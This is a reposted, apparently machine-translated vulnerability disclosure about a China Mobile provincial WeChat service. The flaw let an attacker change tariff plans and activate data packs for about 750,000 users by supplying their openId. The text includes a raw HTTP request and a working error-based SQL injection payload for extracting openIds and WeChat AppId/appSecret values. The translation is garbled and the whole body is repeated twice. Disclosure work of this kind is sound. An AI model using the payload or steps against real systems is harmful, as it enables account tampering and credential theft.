某省移动设计缺陷可随意对75w用户进行套餐变更和上网流量包开通业务
漏洞标题 某省移动设计缺陷可随意对75w用户进行套餐变更和上网流量包开通业务 相关厂商 中国移动 漏洞作者 路人甲 提交时间 2016-05-11 20:10 公开时间 2016-06-27 17:0…
漏洞标题
一个省的移动设计缺陷可以为75w用户和互联网流量包开放服务免费打包
相关制造商
中国移动
漏洞作者
过路人
提交时间
2016-05-11 20: 10
公共时间
2016-06-27 17: 00
漏洞类型
设计缺陷/逻辑错误
危险等级
高
自我评估等级
14
漏洞状态
已提交给第三方合作机构(cncert National Internet Emergency Center)
标签标签
漏洞详细信息
它与两个微信公众账号有关。
打开河南移动10086公众号()
输入更多服务
点击里面查看
主要的URL部分如下:
1.http://**。**。**/weixin/khfwController.dogoIndex& openId=oMAmUjlbJIiy4fJ7xtZ2k9NgLL-I
打开第一个
我不知道我是否没有约束力或其他东西。
这是由其他人的手机号码写的。
河南手机号码可以查询
看着我
以下两家企业不确定它们是否会成功。
无论如何,我测试了我的失败。
似乎是一场商业冲突
漏洞证明:
2.操作75w用户包更改和Internet流量包打开
这需要得到关注微信号的openid。
郑州10086公众号
打开并处理
包更改和互联网流量包存在问题。
以下是Internet流量包的示例。
http://**。**。**。**/hkwx/addValueProductController.do?goAddValueProductList& symbol=addvalue& openId=****& accountId=gh_065a64f56fc7
openId是公共号码的openId
打开一个。
比如五元
GET /hwwx/addValueProductController.do?goAddValueProductDetail&id=402880a94959ad4f014959ae272c0001&symbol=addvalue HTTP/1.1
主机: **。**。**。**
接受: text/html,application/xhtml + xml,application/xml; q=0.9,*/*; q=0.8
连接:保持活动状态
代理连接:保持活动状态
Cookie: JSESSIONID=4453F42BBC0FB439D43D5385EB20AF9B
用户代理: Mozilla/5.0(iPhone; CPU iPhone OS 9_3_1,如Mac OS X)AppleWebKit/601.1.46(KHTML,如Gecko)Mobile/13E238 MicroMessenger/6.3.16 NetType/WIFI Language/en_US
接受语言: zh-cn
Referer:http://**。**。**。**/hkwx/addValueProductController.do?goAddValueProductList& symbol=addvalue& openId=User's openId& accountId=gh_065a64f56fc7
Accept-Encoding: gzip,deflate
获取openId的方法
http://**。**。**。**/hkwx/suggestionPersonController.do?goRandomPage& openId='AND(SELECT 1573 FROM(SELECT COUNT(*),CONCAT(0x71707a6271,(SELECT(ELT)(1573=1573,1) ))),0x71716a6271,FLOOR(RAND(0)* 2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)AND'UVyK'='UVyK
Sql注入
在表weixin_accountinfo中
AppId和appSecret与微信公众号
开放的业务方法
首先打开
http://**。**。**。**/hkwx/addValueProductController.do?goAddValueProductList& symbol=addvalue& openId=***& accountId=gh_065a64f56fc7
然后选择一个包
然后立即点击它
确认
大约75w用户
更改包操作,这几乎是
http://**。**。**。**/hkwx/planController.do?goPlanIndexPage& openId=XXX& accountId=gh_065a64f56fc7
没有证明
河南没有这样的问题。
需要绑定并需要验证码
修理计划:
版权声明:请注明出处。居民A @乌云
打开河南移动10086公众号()
输入更多服务
点击里面查看
主要的URL部分如下:
1.http://**。**。**/weixin/khfwController.dogoIndex& openId=oMAmUjlbJIiy4fJ7xtZ2k9NgLL-I
打开第一个
我不知道我是否没有约束力或其他东西。
这是由其他人的手机号码写的。
河南手机号码可以查询
看着我
以下两家企业不确定它们是否会成功。
无论如何,我测试了我的失败。
似乎是一场商业冲突
漏洞证明:
2.操作75w用户包更改和Internet流量包打开
这需要得到关注微信号的openid。
郑州10086公众号
打开并处理
包更改和互联网流量包存在问题。
以下是Internet流量包的示例。
http://**。**。**。**/hkwx/addValueProductController.do?goAddValueProductList& symbol=addvalue& openId=****& accountId=gh_065a64f56fc7
openId是公共号码的openId
打开一个。
比如五元
GET /hwwx/addValueProductController.do?goAddValueProductDetail&id=402880a94959ad4f014959ae272c0001&symbol=addvalue HTTP/1.1
主机: **。**。**。**
接受: text/html,application/xhtml + xml,application/xml; q=0.9,*/*; q=0.8
连接:保持活动状态
代理连接:保持活动状态
Cookie: JSESSIONID=4453F42BBC0FB439D43D5385EB20AF9B
用户代理: Mozilla/5.0(iPhone; CPU iPhone OS 9_3_1,如Mac OS X)AppleWebKit/601.1.46(KHTML,如Gecko)Mobile/13E238 MicroMessenger/6.3.16 NetType/WIFI Language/en_US
接受语言: zh-cn
Referer:http://**。**。**。**/hkwx/addValueProductController.do?goAddValueProductList& symbol=addvalue& openId=User's openId& accountId=gh_065a64f56fc7
Accept-Encoding: gzip,deflate
获取openId的方法
http://**。**。**。**/hkwx/suggestionPersonController.do?goRandomPage& openId='AND(SELECT 1573 FROM(SELECT COUNT(*),CONCAT(0x71707a6271,(SELECT(ELT)(1573=1573,1) ))),0x71716a6271,FLOOR(RAND(0)* 2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)AND'UVyK'='UVyK
Sql注入
在表weixin_accountinfo中
AppId和appSecret与微信公众号
开放的业务方法
首先打开
http://**。**。**。**/hkwx/addValueProductController.do?goAddValueProductList& symbol=addvalue& openId=***& accountId=gh_065a64f56fc7
然后选择一个包
然后立即点击它
确认
大约75w用户
更改包操作,这几乎是
http://**。**。**。**/hkwx/planController.do?goPlanIndexPage& openId=XXX& accountId=gh_065a64f56fc7
没有证明
河南没有这样的问题。
需要绑定并需要验证码
修理计划:
版权声明:请注明出处。居民A @乌云
- 发表于 2016-07-17 08:00
- 阅读 ( 512 )
- 分类:黑客技术
